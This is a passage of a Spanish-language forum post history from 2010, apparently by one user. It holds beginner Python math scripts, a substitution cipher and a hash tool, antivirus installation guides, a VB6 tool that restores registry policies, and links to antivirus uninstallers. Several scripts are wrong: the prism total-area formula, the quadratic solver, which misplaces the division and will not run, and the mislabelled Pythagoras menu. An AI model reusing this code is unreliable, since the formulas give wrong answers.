   except: # Contenido del except, con el cual controlamos el manejo de errores
       print 'Surgio un error, intente nuevamente' # Mensaje a devolver en caso de que haya surgido un error mientras se ejecutaba el 'try'.


Este corto y sencillo código, nos devuelve:

IDLE 2.6.5      ==== No Subprocess ====
>>>
Ingrese un numero entero: 2
Ingrese otro numero entero: 4
El segundo es el cuadrado exacto del primero
Ingrese un numero entero: 2
Ingrese otro numero entero: 3
El segundo es menor que el cuadrado del primero
Ingrese un numero entero: 2
Ingrese otro numero entero: 5
El segundo es mayor que el cuadrado del primero
Ingrese otro numero entero: HOLA
Surgio un error, intente nuevamente


Como veran, cumple con los requerimientos de el ejercicio y cumple con el manejo de errores.

Saludos a todos, y espero ver sus formas de resolver este problema :D

Saludos a todos ;)
#19

Existen varias implementaciones distintas de Python: CPython, Jython, IronPython, PyPy, etc.
CPython es la más utilizada y la más madura. Cuando la gente habla de Python normalmente se refiere a esta implementación. En este caso tanto el intérprete como los módulos están escritos en C.

Jython es la implementación en Java de Python, mientras que IronPython es su contrapartida en C# (.NET). Su interés estriba en que utilizando estas implementaciones se pueden utilizar todas las librerías disponibles para los programadores de Java y .NET.
PyPy, por último, como habréis adivinado por el nombre, se trata de una implementación en Python de Python.

El metodo de uso de la implementacion es igual a que usar el Python comun y corriente, pero entonces ¿Para que estan las implementaciones?

Eso es algo facil de responder, estas implementaciones son, para que podamos importar librerias de ese lenguaje y utilizarlas en nuestro codigo, para ver mas informacion, visita el link de wikipedia de cada implementacion





¿De donde puedo descargar PyPy?

Puedes hacerlo desde el link original







¿De donde puedo descargar JPython?

Puedes hacerlo desde el enlace original







¿De donde puedo descargar IronPython?

Puedes hacerlo tambien, desde el link original

http://ironpython.net/download/






¿De donde puedo descargar Spyco?

Puedes descargarlo desde su link original

Este implemento de python es bastante recomendado, ya que con una pequeña tardanza mas en su inicio, la ejecucion de nuestro codigo es incrementada en, al menos, 40 veces.

http://psyco.sourceforge.net/download.html

Mas informacion sobre Spyco [Wikipedia]




Espero que les guste a todos, y si ven que algun dato importante falta o creen que hay otra implementacion que deberia estar aca, no duden en enviarme un MP para agregarla ;)
#20
Bueno, este CrackMe es considerado de dificultad « muy dificil » y verdaderamente un reto

He corregido todos los bugs que me han mencionado. Asi que bueno, ni mas ni menos, aqui se los dejo. Saludos ;)



#21
Ingeniería Inversa / [CrackMe] PyCrackMe V2
26 Julio 2010, 23:01 PM
Bueno, la version anterior tenia unos cuantos bugs, cuando escribias letras se cerraba, etc

En esta version, corregi todos esos errores y la hize un poco mas complicada, pero aun sigo aprendiendo



#22
Scripting / [Código] Porcentajes [Python]
26 Julio 2010, 22:36 PM
Aqui les dejo un pequeño code para sacar el porcentaje deseado de un numero :D

Código (python) [Seleccionar]
#####################
# Porcentajes       #
# Autor: Sthefano02 #
#####################

def Porcentaje(X,Y):
    return X*Y/100


print '''
    ===== Porcentajes =====
    =======================
    '''

X = input('Valor > ')
Y = input('Portencaje > ')
print 'El porcentaje es %s' % Porcentaje(X,Y)


Idea original de Javier http://foro.portalhacker.net/index.php/topic,113363.0.html
#23
Código (python) [Seleccionar]
########################
# Teorema de Pitagoras #
# Creador por: S&S Lab #
# http://artehack.net/ #
########################

import math

def Hipotenusa(X,Y):
   return math.sqrt((X*X)+(Y*Y))

def Cateto(X,Y):
   return math.sqrt((X*X)-(Y*Y))



print """
   ==== Teorema de Pitagoras ====
   1 - Hallar valor de un cateto
   2 - Hallar valor de hipotenusa
   ==============================
   """
opcion = input('Elija la opcion deseada > ')
if opcion == 1:
   X = input('Introduce el valor del primer cateto > ')
   Y = input('Introduce el valor del segundo cateto > ')
   print 'El valor de la hipotenusa es > %s' % Hipotenusa(X,Y)
elif opcion == 2:
   X = input('Introduce el valor de un cateto > ')
   Y = input('Introduce el valor de la hipotenusa > ')
   print 'El valor del cateto es > %s' % Cateto(X,Y)
else:
   exit()


Me base en el codigo de mi amigo Stanhmal http://foro.portalhacker.net/index.php/topic,113525.0.html

Saludos a todos ;)
#24
Bueno, leyendo el libro de matematicas del año pasado me encontre con esto y me dieron ganas de hacerlo.

La ecuacion original seria asi:

Citar180° . (n -2) = 720°
N - 2 = 720° : 180°
N = 4 + 2
N = 6

Aqui les dejo el code, funciona sin parentesis en el calculo, pero lo puse para que sea un poco mas facil de leer. Tan solo tienen que introducir la cantidad de grados que tiene el poligono y les dira cuantos lados tiene :)

Código (python) [Seleccionar]
################################
# Lados de un Poligono Regular #
# Autor: Sthefano02            #
# http:comunidadraw.com/       #
################################

def Calcular(X):
   return (X / 180) + 2

print '''
   === Lados de un Poligono Regular ===
   ====================================
   '''

X = input('La suma de los angulos interioes es > ')
print 'El poligono tiene > %s < lados' % Calcular(X)


Saludos a todos, espero que les guste ;)
#25
Bueno, aqui les dejo el calculo original de mi libro de matematicas.

CitarÁrea lateral del prísma = perimetro de la base . altura

Área total del prísma = area lateral + 2 . area de la base

Código (python) [Seleccionar]
##############################
# Calcular area de un Prisma #
# Autor: Sthefano02          #
# http://comunidadraw.com/   #
##############################

def Area_Lateral(Pbase,altura):
    return Pbase * altura

def Area_Total(Alateral,base):
    return (Alateral + 2) * base


print '''
    = Area de un Prisma y Piramide =
    1 - Area lateral del prisma
    2 - Area total del prisma
    ================================
    '''
opcion = input('Elija una opcion > ')
if opcion == 1:
    Pbase = input('Ingrese el perimetro de la base > ')
    altura = input('Ingrese la altura > ')
    print 'El area lateral del prisma es %s' % Area_Lateral(Pbase,altura)
if opcion == 2:
    Alateral = input('Ingrese el area lateral del prisma > ')
    base = input('Ingrese el area de la base > ')
    print 'El area total del prisma es %s' % Area_Total(Alateral,base)


Saludos a todos, espero que os guste ;)
#26
Aqui les dejo un pequeño codigo para calcular el volumen de un cono (tambien funciona con piramides)

Código (python) [Seleccionar]
############################
# Volumen de un cono       #
# Autor: Sthefano02        #
# http://comunidadraw.com/ #
############################

def Volumen(base,altura):
    return (base * altura) / 3


print '''
    === Volumen de un cono ===
    ==========================
    '''

base = input('Area de la base > ')
altura = input('Altura > ')
print 'El volumen del cono es %s' % Volumen(base,altura)


Espero que les guste, saludos ;)
#27
Bueno, pues como dice el titulo, esta aplicacion calcula la cantidad de neutrones en un atomo. Tan solo tienen que ingresar el numero masico del atomo y la cantidad de protones que este tiene, y os devolvera la cantidad de neutrones.

Código (python) [Seleccionar]
###########################
# Neutrones de un atomo   #
# Autor: Sthefano02       #
# Http://comunidadraw.com #
###########################

def Calcular(Masa,Protones):
   return Masa - Protones

print '''
   === Neutrones de un atomo ===
   =============================
   '''

Masa = input('Numero masico del atomo > ')
Protones = input('Cantidad de protones > ')
print 'El atomo posee > %s < neutrones' % Calcular(Masa,Protones)


Miren que interesantes que son las matematicas xD

Espero que les guste, saludos ;)
#28
Código (python) [Seleccionar]
###########################
# Ecuaciones de 2do grado #
# Autor: S&S Labs         #
# Thanks to: WindHack     #
###########################

from math import sqrt

def Calculo(X,Y,Z):

    try:
        N1 = (-Y + ((math.sqrt((Y*Y) - (4*X*Z)))/(2*X)))
        N2 = (-Y - ((math.sqrt((Y*Y) - (4*X*Z)))/(2*X)))

return "(+) = " + str(N1) + "(-) = " + str(N2)

    except:
        return 'Sin solucion, intenta nuevamente'         

while True:
print "Ecuacion de Segundo Grado..."
X = input(' X = ')
Y = input(' Y = ')
Z = input(' Z = ')
print Calculo(X,Y,Z)


Muchas gracias a WindHack por sus largas explicaciones (y muy efectivas) :P

Espero que les guste el code, Saludos a todos ;)
#29
Consiste en reemplazar letras por números según la tabla que está aquí abajo. Las letras que no figuren en la palabra "murciélago", se dejarán con la misma letra. Para codificar número, se realiza inversamente.

M   U   R   C   I   E   L   A   G   O
0   1   2   3   4   5   6   7   8   9





Bueno, nada de otro mundo, solamente un simple reemplazo de caracteres. Saludos ;)

Código (python) [Seleccionar]
def Encode(String):
   Abecedario = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
   Traductor = ['7','B','3','D','5','F','8','H','4','J','K','6','0','N','9','P','Q','2','S','T','1','V','W','X','Y','Z']
   for i in range(26):
       String = String.replace(Abecedario[i],Traductor[i])
   return String

def Decode(String):
   Abecedario = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
   Traductor = ['7','B','3','D','5','F','8','H','4','J','K','6','0','N','9','P','Q','2','S','T','1','V','W','X','Y','Z']
   for i in range(26):
       String = String.replace(Traductor[i],Abecedario[i])
   return String

print '''
   === Clave Murcielago ===
   1 - cifrar
   2 - descifrar
   ========================
   '''

while True:
   String = raw_input('Ingrese una cadena de texto > ')
   opcion = input('Elija una opcion > ')
   if opcion == 1:
       print 'La cadena cifrada es  > %s' % Encode(String)
   elif opcion == 2:
       print 'La cadena descifrada es > %s' % Decode(String)
   else:
       exit()
#30
Simplemente puede codificar una cadena dada por el usuario a el tipo de codificacion que este elija :D

Código (python) [Seleccionar]
import hashlib

def md5(String):
    return hashlib.md5(String).hexdigest()

def sha1(String):
    return hashlib.sha1(String).hexdigest()

def sha224(String):
    return hashlib.sha224(String).hexdigest()

def sha256(String):
    return hashlib.sha256(String).hexdigest()

def sha384(String):
    return hashlib.sha384(String).hexdigest()

def sha512(String):
    return hashlib.sha512(String).hexdigest()

print '''
    === String Encode ===
    1 - md5
    2 - sha1
    3 - sha224
    4 - sha256
    5 - sha384
    6 - sha 512
    =====================
    '''

while True:
    String = raw_input('Ingrese la cadena de texto a convertir > ')
    opcion = input('Elija una opcion > ')
    if opcion == 1:
        print 'Su cadena cifrada es > %s' % md5(String)
    elif opcion == 2:
        print 'Su cadena cifrada es > %s' % sha1(String)
    elif opcion == 3:
        print 'Su cadena cifrada es > %s' % sha224(String)
    elif opcion == 4:
        print 'Su cadena cifrada es > %s' % sha256(String)
    elif opcion == 5:
        print 'Su cadena cifrada es > %s' % sha384(String)
    elif opcion == 6:
        print 'Su cadena cifrada es > %s' % sha512(String)


Saludos a todos ;)

Se aceptan dudas, ideas y sugerencias.
#31
Primero, antes que nada, tendran que descargar el Spybot Search & Destroy. Pueden descargarlo haciendo Click Aqui




Una vez descargado el archivo, les quedara el siguiente autoejecutable:


Denle click, acepten los terminos y condiciones de uso y luego, tendran que elegir que tipo de instalacion quieren hacer. Yo les recomendaria que hagan la Completa ;)



Luego de hacer esto, tendran que seleccionar donde quienren instalar el soft. Eso ya corre por cuenta de ustedes asi que no hace falta que les diga que poner :P

Cuando pasen ese paso, tendremos que seleccionar las tareas adicionales. Aca es donde tendremos que decidir si queremos que Spybot actue junto con internet explorer (protegiendonos de paginas con malware) o queremos que actue como un Antivirus, vigilando nuestro sistema constantemente desde nuestra barra de tareas. Yo les recomendaria NO marcalas, pero como dije antes, ustedes deciden :)


Luego de ese paso, ya podremos comenzar la instalacion. Lo instalan, y una vez instalado el Spybot reinicien su PC. Una vez que se haya reiniciado nuestra computadora, abramos el querido soft para ponerlo en uso. Una vez abierto, tendremos que actualizarlo, para eso vallamos a buscar actualizaciones




Una vez ahi nos saldra la siguiente lista que son los hosting para poder elegir de donde descargar las actualizaciones, ninguno viene infectado ni nada. Lo que cambia es la velocidad de descarga, yo que ustedes elejiria los de USA ya que siempre descargo rapidito de ahi :P


En este caso, como pueden ver, yo tengo 2 actualizaciones para hacer. Probablemente ustedes tengan mas asi que no se asusten xD Para descargar e instalar las actualizaciones solamente tienen que marcarlas y darle a Dowload


Una vez descargadas e instaladas las actualizaciones, podemos empezar a limpiar nuestro PC. Pero antes de ejecutar el Scan, tenemos que cerrar todas las aplicaciones innecesarias (msn, internet, rep. de musica, etc), solamente dejen el antivirus y su firewall (si es que tienen). Cuando las hallan cerrado, abramos de nuevo la ventana del Spybot y demosle a Analizar problemas


Una vez que le dimos a analizar problemas, el analisis empezara automaticamente y cambiaremos a la siguiente pantalla, donde lo que marque en un cuadro rojo son los archivos que va analizando. En pocas palabras vendria a ser el proceso del analizis


Cuando el analisis haya terminado, les mostrara cuales son todas las infeciones que poseen. Disculpen que no suba una imagen mia, esta la tube que sacar de google (las otras si son mias xD) porque no tengo ninguna infeccion. Para eliminar todas sus infecciones, primero marquenlas y luego hagan click en Fix Selected problems


Esperen a que acabe de limpiar y listo, hemos terminado. Y al fin y al cabo, hemos llegado al fin del manual. Quise explicarlo lo mejor posible para que no queden dudas xD Por eso puse tantas imagenes, espero que les haya gustado  :D

Saludos a todos ;)





Esta obra es publicada bajo una licencia Creative Commons
#32
Primero que nada, tendremos que descargar el Dr. Web. Podremos hacerlo haciendo Click Aquí

Una vez descargado, nos saldrá un archivo como el siguiente. Al que tendrán que ejecutar



Si salieron nuevas actualizaciones luego de la que han descargado, quédensen tranquilos que les saldrá en siguiente cartel para que puedan actualizar. A lo que daremos SI



Bueno, descargamos, y ejecutamos de nuevo. Cuando lo ejecutemos, se nos abrirá el programa, y tendremos que hacer click  "Iniciar"



Oh, que es eso, un cartel molesto. Pues si, tendremos que confirmar que iniciaremos el Scan. Pero lean esta parte, yo les diré que hagan exactamente lo mismo. Luego de haber entendido esto, daremos en aceptar.


Ahora, empezaremos el famoso Scan. Cuando empieze, traten de tener todas las aplicaciones innecesarias cerradas (MSN, explorador, reproductores de música, etc.) así el análisis de nuestro PC será mas rápido.



Dr. Web eliminara todos los virus que tenga nuestro sistema, o como mínimo si no los puede eliminar (como a veces suele pasar) los pondrá en cuarentena para que no afecten mas a nuestro sistema. Quédensen tranquilos que Dr. Web siempre pregunta antes de eliminar o mover algo, así que es muy seguro, funcional y recomendado.

Saludos a todos y espero que les haya gustado ;)





Esta obra es publicada bajo una licencia Creative Commons
#33
Aqui les dejo un archivo con 10 .pdf, estan MUY buenos. Yo los he leido todos y estan bien completos. Se los recomiendo ;)


Contiene:

0. Conceptos basicos
1. Amenazas actuales
2. Instalacion y configuracion de un sistema operativo
3. Proteccion de un equipo de la informacion
4. Proteccion contra el malware
5. Navegacion segura
6. Seguridad en redes inalambricas
7. Uso publico de la computadora
8. Seguridad de los menores de edad
9. Conclusiones

Autor: Eset Lab
Tamaño: 1.18 MB
Alojamiento: Mediafire

Click Aqui Para Descargar [Mi Subida]

Si quereis los links originales, tienen que registrarse en la "Plataforma Educativa de Eset"

http://edu.eset-la.com/

Una vez registrados, elijan el/los cursos que quieran y descarguen los documentos
#34
Aqui les dejo un archivo que acabo de subir, contiene varios .pdf sobre seguridad en empresas Pymes


Contiene:

0. Objetivos y alcances
1. Gestion de la seguridad
2. Infraestructura y comunicaciones
3. Prevencion de incidentes
4. Buenas Practicas
5. Conclusion

Autor: Eset Lab
Tamaño: 1,43 MB
Alojamiento: Mediafire

Click Aqui Para Descargar [Mi Subida]
#35
Aqui les dejo esta aplicacion, creada por 11Sep y yo. Lo que hace es restaurar entradas que podrian haber sido modificadas para evitar alguna de las acciones mostradas en la imagen. Esta es la primer version, para la proxima agregaremos mas entradas y quizas cambiemos la interfaz.



Código (vb) [Seleccionar]

Option Explicit
Dim Rege As Object

Const System  As String = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"
Const Explorer As String = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\"

Private Sub Form_Load()
   Set Rege = CreateObject("WScript.Shell")
End Sub

Private Sub LblAceptar_Click()
  If Me.ChkAdmin.Value = 1 Then TaskMgr
  If Me.ChkApagar.Value = 1 Then Boton
  If Me.ChkBuscar.Value = 1 Then Buscar
  If Me.ChkDesinstalar.Value = 1 Then DesInstalar
  If Me.ChkMenu.Value = 1 Then Menu
  If Me.ChkMsConfig.Value = 1 Then MsConfig
  If Me.ChkOcultos.Value = 1 Then FilesHidden
  If Me.ChkOptFile.Value = 1 Then OptCarpeta
  If Me.ChkPanel.Value = 1 Then Panel
  If Me.ChkPantalla.Value = 1 Then Pantalla
  If Me.ChkReg.Value = 1 Then Registro
  If Me.ChkRun.Value = 1 Then Ejecutar
 
  MsgBox "Listo, para que los cambios hagan efecto, por favor reinicie el PC", vbInformation, "S&S Labs"
End Sub

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'1.
Sub Registro()
On Error Resume Next
'Habilita el registro
   Rege.regdelete System & "DisableRegistryTools"
End Sub

'2.
Sub TaskMgr()
On Error Resume Next
'Habilita el Administrador de tareas
   Rege.regdelete System & "DisableTaskMgr"
End Sub

'3.
Sub OptCarpeta()
On Error Resume Next
'Habilita las opciones de carpeta
   Rege.regdelete Explorer & "NoFolderOptions"
End Sub

'4.
Sub Ejecutar()
On Error Resume Next
'Habilita ejecutar [Win + r]
   Rege.regdelete Explorer & "NoRun"
End Sub

'5.
Sub Panel()
On Error Resume Next
'Habilita panel de control
   Rege.regdelete Explorer & "NoControlPanel"
End Sub

'6.
Sub Boton()
On Error Resume Next
'Muestra el boton apagar
   Rege.regdelete Explorer & "NoClose"
End Sub

'7.
Sub DesInstalar()
On Error Resume Next
'Permite desinstalar programas
   Rege.regdelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms"
End Sub

'8.
Sub Menu()
On Error Resume Next
'Habilita el menu contextual
   Rege.regdelete Explorer & "NoViewContextMenu"
End Sub

'9.
Sub Pantalla()
On Error Resume Next
'Propiedades de pantalla
   Rege.regdelete System & "NoDispCpl"
End Sub

'10.
Sub Buscar()
On Error Resume Next
'Habilita la opcion buscar
   Rege.regdelete Explorer & "NoFind"
End Sub

'11.
Sub MsConfig()
On Error Resume Next
'Habilita el msconfig
   Rege.regdelete System & "DisableMsConfig"
End Sub

'12.
Sub FilesHidden()
On Error Resume Next
'Muestralos archivos ocultos
   Rege.regdelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Advanced\Hidden"
End Sub


Saludos ;)


S&S Labs
#36
Seguridad / Desinstaladores de Antivirus
26 Julio 2010, 22:09 PM
Aqui os dejo los desinstaladores de algunos Antivirus. Si alguno tiene alguno que no haya posteado me lo puede enviar por MP.

Desinstalar Avast

Desinstalar AVG

Desinstalar Kaspersky

Desinstalar Bit Defender

Desinstalar McAfee

Desinstalar Eset Nod32

Desinstalar Panda

Desinstalar Symantec (Norton)

Desinstalar Trend Micro

Saludos a todos y espero que les sirva ;)



Si aun sigues sin poder desinstalar tu AV, proba con este y seguro lo eliminaras de tu sistema ;D